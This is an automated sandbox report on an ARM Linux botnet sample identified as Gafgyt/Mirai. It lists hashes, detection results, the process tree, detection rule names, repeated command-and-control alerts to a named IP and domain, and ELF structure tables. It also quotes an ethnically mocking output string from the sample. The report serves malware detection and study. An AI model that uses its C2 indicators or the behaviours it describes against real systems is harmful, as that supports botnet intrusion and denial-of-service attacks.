Linux
Analysis Report
armv5l.elf
Overview
General Information
Sample name: | armv5l.elf |
Analysis ID: | 1686582 |
Has dependencies: | false |
MD5: | b5f34dc985b694d184a7de01815d04af |
SHA1: | 5bcc3317536967a9125ad634db03c2009819dd48 |
SHA256: | 74e678410939ac73a276aa81194dbd360e9f85daa654c2f4c4912af6a2f4f26b |
Tags: | elfuser-abuse_ch |
Infos: |
Detection
Score: | 92 |
Range: | 0 - 100 |
Signatures
Classification
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1686582 |
Start date and time: | 2025-05-10 07:47:50 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 12s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultlinuxfilecookbook.jbs |
Analysis system description: | Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11) |
Analysis Mode: | default |
Sample name: | armv5l.elf |
Detection: | MAL |
Classification: | mal92.spre.troj.linELF@0/0@4/0 |
- VT rate limit hit for: gay.energy
Command: | /tmp/armv5l.elf |
PID: | 6243 |
Exit Code: | 0 |
Exit Code Info: | |
Killed: | False |
Standard Output: | gosh that chinese family at the other table sure ate alot |
Standard Error: |
- system is lnxubuntu20
- armv5l.elf New Fork (PID: 6245, Parent: 6243)
- sh New Fork (PID: 6263, Parent: 6245)
- sh New Fork (PID: 6264, Parent: 6245)
- sh New Fork (PID: 6265, Parent: 6245)
- sh New Fork (PID: 6267, Parent: 6245)
- armv5l.elf New Fork (PID: 6247, Parent: 6243)
- armv5l.elf New Fork (PID: 6248, Parent: 6243)
- armv5l.elf New Fork (PID: 6253, Parent: 6248)
- dash New Fork (PID: 6325, Parent: 4334)
- dash New Fork (PID: 6326, Parent: 4334)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Bashlite, Gafgyt | Bashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Mirai | Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world. | No Attribution |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Gafgyt | Yara detected Gafgyt | Joe Security | ||
JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security | ||
Linux_Trojan_Gafgyt_28a2fe0c | unknown | unknown |
| |
Linux_Trojan_Gafgyt_6a510422 | unknown | unknown |
| |
Linux_Trojan_Gafgyt_d2953f92 | unknown | unknown |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security | ||
Linux_Trojan_Gafgyt_28a2fe0c | unknown | unknown |
| |
Linux_Trojan_Gafgyt_6a510422 | unknown | unknown |
| |
Linux_Trojan_Gafgyt_d2953f92 | unknown | unknown |
| |
JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security | ||
Click to see the 13 entries |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-05-10T07:48:46.034007+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.23 | 48432 | TCP |
2025-05-10T07:49:01.584776+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.23 | 48434 | TCP |
2025-05-10T07:49:17.328900+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.23 | 48438 | TCP |
2025-05-10T07:49:32.895357+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.23 | 48440 | TCP |
2025-05-10T07:49:48.461767+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.23 | 48442 | TCP |
2025-05-10T07:50:04.022516+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.23 | 48444 | TCP |
2025-05-10T07:50:19.582127+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.23 | 48446 | TCP |
2025-05-10T07:50:35.139981+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.23 | 48448 | TCP |
2025-05-10T07:50:50.698277+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.23 | 48450 | TCP |
2025-05-10T07:51:06.259310+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.23 | 48452 | TCP |
2025-05-10T07:51:21.819878+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.23 | 48454 | TCP |
2025-05-10T07:51:37.379252+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.23 | 48456 | TCP |
2025-05-10T07:51:52.932531+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.23 | 48458 | TCP |
2025-05-10T07:52:08.494544+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.23 | 48460 | TCP |
Click to jump to signature section
AV Detection |
---|
Source: | Avira: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Spreading |
---|
Source: | Opens: | Jump to behavior |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | TCP traffic: |
Source: | Wget executable: | Jump to behavior |
Source: | Reads hosts file: | Jump to behavior |
Source: | DNS traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Classification label: |
Source: | ELF static info symbol of initial sample: | ||
Source: | ELF static info symbol of initial sample: | ||
Source: | ELF static info symbol of initial sample: | ||
Source: | ELF static info symbol of initial sample: | ||
Source: | ELF static info symbol of initial sample: | ||
Source: | ELF static info symbol of initial sample: | ||
Source: | ELF static info symbol of initial sample: | ||
Source: | ELF static info symbol of initial sample: | ||
Source: | ELF static info symbol of initial sample: |
Source: | File: | Jump to behavior | ||
Source: | Directory: | Jump to behavior | ||
Source: | Directory: | Jump to behavior |
Source: | Empty hidden file: | Jump to behavior |
Source: | Shell command executed: | Jump to behavior |
Source: | Chmod executable: | Jump to behavior |
Source: | Rm executable: | Jump to behavior | ||
Source: | Rm executable: | Jump to behavior | ||
Source: | Rm executable: | Jump to behavior |
Source: | Wget executable: | Jump to behavior |
Source: | File: | Jump to behavior |
Source: | Chmod executable with 777: | Jump to behavior |
Source: | Queries kernel information via 'uname': | Jump to behavior | ||
Source: | Queries kernel information via 'uname': | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Stealing of Sensitive Information |
---|
Source: | File source: |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | User agent string found: | ||
Source: | User agent string found: | ||
Source: | User agent string found: | ||
Source: | User agent string found: | ||
Source: | User agent string found: | ||
Source: | User agent string found: | ||
Source: | User agent string found: | ||
Source: | User agent string found: | ||
Source: | User agent string found: | ||
Source: | User agent string found: | ||
Source: | User agent string found: | ||
Source: | User agent string found: | ||
Source: | User agent string found: | ||
Source: | User agent string found: | ||
Source: | User agent string found: | ||
Source: | User agent string found: | ||
Source: | User agent string found: | ||
Source: | User agent string found: | ||
Source: | User agent string found: | ||
Source: | User agent string found: | ||
Source: | User agent string found: | ||
Source: | User agent string found: | ||
Source: | User agent string found: | ||
Source: | User agent string found: | ||
Source: | User agent string found: | ||
Source: | User agent string found: | ||
Source: | User agent string found: |
Remote Access Functionality |
---|
Source: | File source: |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 1 Scripting | Valid Accounts | Windows Management Instrumentation | 1 Scripting | Path Interception | 1 Hide Artifacts | OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | 1 Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 2 File and Directory Permissions Modification | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Hidden Files and Directories | Security Account Manager | 1 Remote System Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 File Deletion | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 1 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | 12 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
65% | Virustotal | Browse | ||
69% | ReversingLabs | Linux.Trojan.Gafgyt | ||
100% | Avira | LINUX/Gafgyt.opnd |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
gay.energy | unknown | unknown | true | unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
34.249.145.219 | unknown | United States | 16509 | AMAZON-02US | false | |
92.60.77.69 | unknown | Italy | 5602 | AS-IRIDEOS-KPIT | true | |
109.202.202.202 | unknown | Switzerland | 13030 | INIT7CH | false | |
91.189.91.43 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false | |
91.189.91.42 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
34.249.145.219 | Get hash | malicious | Prometei | Browse | ||
Get hash | malicious | Prometei | Browse | |||
Get hash | malicious | Prometei | Browse | |||
Get hash | malicious | Gafgyt | Browse | |||
Get hash | malicious | Prometei | Browse | |||
Get hash | malicious | Prometei | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Prometei | Browse | |||
Get hash | malicious | Prometei | Browse | |||
Get hash | malicious | Mirai | Browse | |||
92.60.77.69 | Get hash | malicious | Gafgyt, Mirai | Browse | ||
Get hash | malicious | Gafgyt, Mirai | Browse | |||
Get hash | malicious | Gafgyt, Mirai | Browse | |||
Get hash | malicious | Gafgyt, Mirai | Browse | |||
109.202.202.202 | Get hash | malicious | Gafgyt, Mirai | Browse | ||
Get hash | malicious | Prometei | Browse | |||
Get hash | malicious | Prometei | Browse | |||
Get hash | malicious | Prometei | Browse | |||
Get hash | malicious | Prometei | Browse | |||
Get hash | malicious | Prometei | Browse | |||
Get hash | malicious | Gafgyt | Browse | |||
Get hash | malicious | Gafgyt | Browse | |||
Get hash | malicious | Gafgyt | Browse | |||
Get hash | malicious | Gafgyt | Browse | |||
91.189.91.43 | Get hash | malicious | Gafgyt, Mirai | Browse | ||
Get hash | malicious | Prometei | Browse | |||
Get hash | malicious | Prometei | Browse | |||
Get hash | malicious | Prometei | Browse | |||
Get hash | malicious | Prometei | Browse | |||
Get hash | malicious | Prometei | Browse | |||
Get hash | malicious | Gafgyt | Browse | |||
Get hash | malicious | Gafgyt | Browse | |||
Get hash | malicious | Gafgyt | Browse | |||
Get hash | malicious | Gafgyt | Browse | |||
91.189.91.42 | Get hash | malicious | Gafgyt, Mirai | Browse | ||
Get hash | malicious | Prometei | Browse | |||
Get hash | malicious | Prometei | Browse | |||
Get hash | malicious | Prometei | Browse | |||
Get hash | malicious | Prometei | Browse | |||
Get hash | malicious | Prometei | Browse | |||
Get hash | malicious | Gafgyt | Browse | |||
Get hash | malicious | Gafgyt | Browse | |||
Get hash | malicious | Gafgyt | Browse | |||
Get hash | malicious | Gafgyt | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CANONICAL-ASGB | Get hash | malicious | Gafgyt, Mirai | Browse |
| |
Get hash | malicious | Prometei | Browse |
| ||
Get hash | malicious | Prometei | Browse |
| ||
Get hash | malicious | Prometei | Browse |
| ||
Get hash | malicious | Prometei | Browse |
| ||
Get hash | malicious | Prometei | Browse |
| ||
Get hash | malicious | Gafgyt | Browse |
| ||
Get hash | malicious | Gafgyt | Browse |
| ||
Get hash | malicious | Gafgyt | Browse |
| ||
Get hash | malicious | Gafgyt | Browse |
| ||
AS-IRIDEOS-KPIT | Get hash | malicious | Gafgyt, Mirai | Browse |
| |
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
CANONICAL-ASGB | Get hash | malicious | Gafgyt, Mirai | Browse |
| |
Get hash | malicious | Prometei | Browse |
| ||
Get hash | malicious | Prometei | Browse |
| ||
Get hash | malicious | Prometei | Browse |
| ||
Get hash | malicious | Prometei | Browse |
| ||
Get hash | malicious | Prometei | Browse |
| ||
Get hash | malicious | Gafgyt | Browse |
| ||
Get hash | malicious | Gafgyt | Browse |
| ||
Get hash | malicious | Gafgyt | Browse |
| ||
Get hash | malicious | Gafgyt | Browse |
| ||
INIT7CH | Get hash | malicious | Gafgyt, Mirai | Browse |
| |
Get hash | malicious | Prometei | Browse |
| ||
Get hash | malicious | Prometei | Browse |
| ||
Get hash | malicious | Prometei | Browse |
| ||
Get hash | malicious | Prometei | Browse |
| ||
Get hash | malicious | Prometei | Browse |
| ||
Get hash | malicious | Gafgyt | Browse |
| ||
Get hash | malicious | Gafgyt | Browse |
| ||
Get hash | malicious | Gafgyt | Browse |
| ||
Get hash | malicious | Gafgyt | Browse |
| ||
AMAZON-02US | Get hash | malicious | Gafgyt, Mirai | Browse |
| |
Get hash | malicious | Prometei | Browse |
| ||
Get hash | malicious | Prometei | Browse |
| ||
Get hash | malicious | Nitol | Browse |
| ||
Get hash | malicious | AgentTesla, DarkCloud | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Prometei | Browse |
| ||
Get hash | malicious | FormBook | Browse |
|
File type: | |
Entropy (8bit): | 6.098788951437949 |
TrID: |
|
File name: | armv5l.elf |
File size: | 143'044 bytes |
MD5: | b5f34dc985b694d184a7de01815d04af |
SHA1: | 5bcc3317536967a9125ad634db03c2009819dd48 |
SHA256: | 74e678410939ac73a276aa81194dbd360e9f85daa654c2f4c4912af6a2f4f26b |
SHA512: | 791ac408f6c57f422e93532813385d87988218ad66bad34756c63c0243017e5f832e05e5dc5ff86efe733c7a237198c67611b0f5ba4aa1070625e7f389475fba |
SSDEEP: | 3072:E4OFgAaa+VV3NbHUOzqZ+3q+wHEkmhxQwoVZUNu:E16a+VVJqZ+3qhEkmhxQwoVZUNu |
TLSH: | 0BE31A30D4504B17C2D213FAA69E825E3F221FA793D733115B38BAB41FE279E1D69924 |
File Content Preview: | .ELF..............(.........4...\.......4. ...(........p.................................................................................k..........Q.td..................................-...L..................G.F.G.F.G.F.G.F G.F(G.F0G.F8G.F@G.FHG.FPG.FXG. |
ELF header | |
---|---|
Class: | |
Data: | |
Version: | |
Machine: | |
Version Number: | |
Type: | |
OS/ABI: | |
ABI Version: | 0 |
Entry Point Address: | |
Flags: | |
ELF Header Size: | 52 |
Program Header Offset: | 52 |
Program Header Size: | 32 |
Number of Program Headers: | 4 |
Section Header Offset: | 110172 |
Section Header Size: | 40 |
Number of Section Headers: | 24 |
Header String Table Index: | 21 |
Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align |
---|---|---|---|---|---|---|---|---|---|---|
NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0 | 0 | 0 | ||
.init | PROGBITS | 0x80b4 | 0xb4 | 0x10 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.text | PROGBITS | 0x80d0 | 0xd0 | 0x149d4 | 0x0 | 0x6 | AX | 0 | 0 | 16 |
.fini | PROGBITS | 0x1caa4 | 0x14aa4 | 0x10 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.rodata | PROGBITS | 0x1cab8 | 0x14ab8 | 0x4534 | 0x0 | 0x2 | A | 0 | 0 | 8 |
.ARM.extab | PROGBITS | 0x20fec | 0x18fec | 0x18 | 0x0 | 0x2 | A | 0 | 0 | 4 |
.ARM.exidx | ARM_EXIDX | 0x21004 | 0x19004 | 0x10 | 0x0 | 0x82 | AL | 2 | 0 | 4 |
.eh_frame | PROGBITS | 0x29014 | 0x19014 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.init_array | INIT_ARRAY | 0x29018 | 0x19018 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.fini_array | FINI_ARRAY | 0x2901c | 0x1901c | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.jcr | PROGBITS | 0x29020 | 0x19020 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.got | PROGBITS | 0x29024 | 0x19024 | 0x78 | 0x4 | 0x3 | WA | 0 | 0 | 4 |
.data | PROGBITS | 0x2909c | 0x1909c | 0x31c | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.bss | NOBITS | 0x293b8 | 0x193b8 | 0x676c | 0x0 | 0x3 | WA | 0 | 0 | 8 |
.comment | PROGBITS | 0x0 | 0x193b8 | 0xce2 | 0x0 | 0x0 | 0 | 0 | 1 | |
.debug_aranges | PROGBITS | 0x0 | 0x1a0a0 | 0xe0 | 0x0 | 0x0 | 0 | 0 | 8 | |
.debug_info | PROGBITS | 0x0 | 0x1a180 | 0x4b0 | 0x0 | 0x0 | 0 | 0 | 1 | |
.debug_abbrev | PROGBITS | 0x0 | 0x1a630 | 0x8c | 0x0 | 0x0 | 0 | 0 | 1 | |
.debug_line | PROGBITS | 0x0 | 0x1a6bc | 0x655 | 0x0 | 0x0 | 0 | 0 | 1 | |
.debug_frame | PROGBITS | 0x0 | 0x1ad14 | 0x58 | 0x0 | 0x0 | 0 | 0 | 4 | |
.ARM.attributes | ARM_ATTRIBUTES | 0x0 | 0x1ad6c | 0x10 | 0x0 | 0x0 | 0 | 0 | 1 | |
.shstrtab | STRTAB | 0x0 | 0x1ad7c | 0xdd | 0x0 | 0x0 | 0 | 0 | 1 | |
.symtab | SYMTAB | 0x0 | 0x1b21c | 0x5130 | 0x10 | 0x0 | 23 | 700 | 4 | |
.strtab | STRTAB | 0x0 | 0x2034c | 0x2b78 | 0x0 | 0x0 | 0 | 0 | 1 |
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
---|---|---|---|---|---|---|---|---|---|---|---|
EXIDX | 0x19004 | 0x21004 | 0x21004 | 0x10 | 0x10 | 2.4056 | 0x4 | R | 0x4 | .ARM.exidx | |
LOAD | 0x0 | 0x8000 | 0x8000 | 0x19014 | 0x19014 | 6.1975 | 0x5 | R E | 0x8000 | .init .text .fini .rodata .ARM.extab .ARM.exidx | |
LOAD | 0x19014 | 0x29014 | 0x29014 | 0x3a4 | 0x6b10 | 4.0673 | 0x6 | RW | 0x8000 | .eh_frame .init_array .fini_array .jcr .got .data .bss | |
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x7 | RWE | 0x4 |
Name | Version Info Name | Version Info File Name | Section Name | Value | Size | Symbol Type | Symbol Bind | Symbol Visibility | Ndx |
---|---|---|---|---|---|---|---|---|---|
.symtab | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF | |||
.symtab | 0x80b4 | 0 | SECTION | <unknown> | DEFAULT | 1 | |||
.symtab | 0x80d0 | 0 | SECTION | <unknown> | DEFAULT | 2 | |||
.symtab | 0x1caa4 | 0 | SECTION | <unknown> | DEFAULT | 3 | |||
.symtab | 0x1cab8 | 0 | SECTION | <unknown> | DEFAULT | 4 | |||
.symtab | 0x20fec | 0 | SECTION | <unknown> | DEFAULT | 5 | |||
.symtab | 0x21004 | 0 | SECTION | <unknown> | DEFAULT | 6 | |||
.symtab | 0x29014 | 0 | SECTION | <unknown> | DEFAULT | 7 | |||
.symtab | 0x29018 | 0 | SECTION | <unknown> | DEFAULT | 8 | |||
.symtab | 0x2901c | 0 | SECTION | <unknown> | DEFAULT | 9 | |||
.symtab | 0x29020 | 0 | SECTION | <unknown> | DEFAULT | 10 | |||
.symtab | 0x29024 | 0 | SECTION | <unknown> | DEFAULT | 11 | |||
.symtab | 0x2909c | 0 | SECTION | <unknown> | DEFAULT | 12 | |||
.symtab | 0x293b8 | 0 | SECTION | <unknown> | DEFAULT | 13 | |||
.symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 14 | |||
.symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 15 | |||
.symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 16 | |||
.symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 17 | |||
.symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 18 | |||
.symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 19 | |||
.symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 20 | |||
.symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 21 | |||
.symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 22 | |||
.symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 23 | |||
$a | .symtab | 0x80b4 | 0 | NOTYPE | <unknown> | DEFAULT | 1 | ||
$a | .symtab | 0x1caa4 | 0 | NOTYPE | <unknown> | DEFAULT | 3 | ||
$a | .symtab | 0x80c0 | 0 | NOTYPE | <unknown> | DEFAULT | 1 | ||
$a | .symtab | 0x1cab0 | 0 | NOTYPE | <unknown> | DEFAULT | 3 | ||
$a | .symtab | 0x810c | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0x8150 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0x81b0 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0x81ec | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0x8614 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0x8760 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0x8838 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0x8990 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0x8ad4 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0x93c8 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0x97a8 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0x9930 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0x9a88 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0x9db4 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0xa08c | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0xa4a8 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0xa50c | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0xb530 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0xbc04 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0xbd28 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0xc3bc | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0xca6c | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0xdab8 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0xe794 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0xea50 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0xf400 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
$a | .symtab | 0xf494 | 0 | NOTYPE | <unknown> | DEFAULT | 2 | ||
